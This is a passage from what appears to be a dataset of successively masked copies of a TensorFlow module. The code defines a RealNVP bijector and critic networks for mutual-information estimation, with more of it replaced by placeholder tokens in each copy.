graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), 
[\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n <function token>\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', 
**kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def 
call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n <function token>\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n <function token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n <function token>\n <function token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n <function token>\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass 